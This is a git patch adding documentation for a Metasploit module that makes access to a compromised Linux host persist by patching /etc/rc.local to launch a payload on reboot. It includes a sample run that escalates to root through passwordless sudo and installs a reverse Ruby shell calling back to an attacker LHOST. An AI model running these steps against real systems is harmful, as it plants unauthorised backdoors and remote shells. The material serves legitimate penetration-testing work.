From aa58634b240e46e1b28bd53fe61f97c568ff2844 Mon Sep 17 00:00:00 2001
From: Eliott Teissonniere <10683430+DeveloppSoft@users.noreply.github.com>
Date: Mon, 16 Jul 2018 09:34:20 +0200
Subject: [PATCH] Document rc.local

---
 .../linux/local/rc_local_persistence.md       | 46 +++++++++++++++++++
 1 file changed, 46 insertions(+)
 create mode 100644 documentation/modules/exploit/linux/local/rc_local_persistence.md

diff --git a/documentation/modules/exploit/linux/local/rc_local_persistence.md b/documentation/modules/exploit/linux/local/rc_local_persistence.md
new file mode 100644
index 0000000000..60abc22375
--- /dev/null
+++ b/documentation/modules/exploit/linux/local/rc_local_persistence.md
@@ -0,0 +1,46 @@
+## rc.local Persistence
+
+This module patch `/etc/rc.local` in order to launch a payload upon reboots.
+
+
+### Verification
+
+1. Exploit a box and get a **root** session (tip: try `post/multi/manage/sudo`)
+2. `use exploit/linux/local/rc_local_persistence`
+3. `set SESSION #`
+4. `set PAYLOAD #`
+5. `set LHOST ##`
+6. `exploit`
+
+
+### Sample run
+
+#### Escalate the session if needed
+
+```
+msf5 exploit(linux/local/rc_local_persistence) > use post/multi/manage/sudo 
+msf5 post(multi/manage/sudo) > set session 3
+session => 3
+msf5 post(multi/manage/sudo) > run
+
+[*] SUDO: Attempting to upgrade to UID 0 via sudo
+[*] No password available, trying a passwordless sudo.
+[+] SUDO: Root shell secured.
+[*] Post module execution completed
+```
+
+#### Persist
+
+```
+msf5 post(multi/manage/sudo) > use exploit/linux/local/rc_local_persistence
+msf5 exploit(multi/handler) > set payload cmd/unix/reverse_ruby
+payload => cmd/unix/reverse_ruby
+msf5 exploit(linux/local/rc_local_persistence) > set LHOST 192.168.0.41
+LHOST => 192.168.0.41`
+msf5 exploit(linux/local/rc_local_persistence) > run
+
+[*] Reading /etc/rc.local
+[*] Patching /etc/rc.local
+[*] Max line length is 65537
+[*] Writing 650 bytes in 1 chunks of 2251 bytes (octal-encoded), using printf
+```